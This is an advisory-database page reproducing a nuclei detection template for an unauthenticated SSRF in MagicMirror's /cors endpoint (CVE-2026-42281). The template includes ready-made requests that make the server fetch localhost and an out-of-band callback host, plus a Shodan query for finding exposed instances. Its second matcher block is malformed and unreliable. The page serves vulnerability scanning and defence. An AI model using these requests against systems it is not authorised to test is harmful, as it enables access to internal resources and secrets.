Lucene search
K

MagicMirror <= 2.35.0 - Server-Side Request Forgery

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

Unauthenticated SSRF in MagicMirror cors endpoint enables access to internal resources and secret exfiltration.

Related
Refs
Code
id: CVE-2026-42281

info:
  name: MagicMirror <= 2.35.0 - Server-Side Request Forgery
  author: aleff-github
  severity: critical
  description: |
    An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (VAR_NAME), enabling exfiltration of server-side secrets.
  impact: |
    A remote unauthenticated attacker can force the MagicMirror server to request localhost, internal network, and cloud metadata endpoints. In affected configurations, the endpoint can return server-side responses to the attacker.
  remediation: |
    Upgrade MagicMirror to version 2.36.0 or later.
  reference:
    - https://github.com/advisories/GHSA-ph6f-2cvq-79hq
    - https://github.com/MagicMirrorOrg/MagicMirror/security/advisories/GHSA-ph6f-2cvq-79hq
    - https://github.com/MagicMirrorOrg/MagicMirror/releases/tag/v2.36.0
    - https://osv.dev/vulnerability/GHSA-ph6f-2cvq-79hq
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-42281
    epss-score: 0.01623
    epss-percentile: 0.73243
    cwe-id: CWE-918
  metadata:
    max-request: 2
    verified: true
    product: magicmirror
    vendor: magicmirrororg
    shodan-query: 'http.title:"MagicMirror"'
  tags: cve,cve2026,magicmirror,ssrf,unauth,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - "MagicMirror"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cors?url=http://127.0.0.1:8080/version"
      - "{{BaseURL}}/cors?url=http://{{interactsh-url}}/version"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        name: version
        dsl:
          - regex('^(?:[01]\.[0-9]+\.[0-9]+|2\.(?:[0-9]|[12][0-9]|3[0-5])\.[0-9]+)\s*$', body)
          - status_code == 200
        condition: and

      - type: dsl
        name: dns
          - "contains(interactsh_protocol,'dns')"
          - status_code == 200
        condition: and
# digest: 4a0a00473045022012b9fc3ab36e974d0676d707e1eccc1b3c90a786cb59162748944779dfcd793a022100d3b47d367f2f5d48daa6fc965dc6d5100dac51d7214dba2d5e8c2a2044af9e5b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 May 2026 16:50Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.18.6
CVSS 49.2
EPSS0.01623
SSVC
15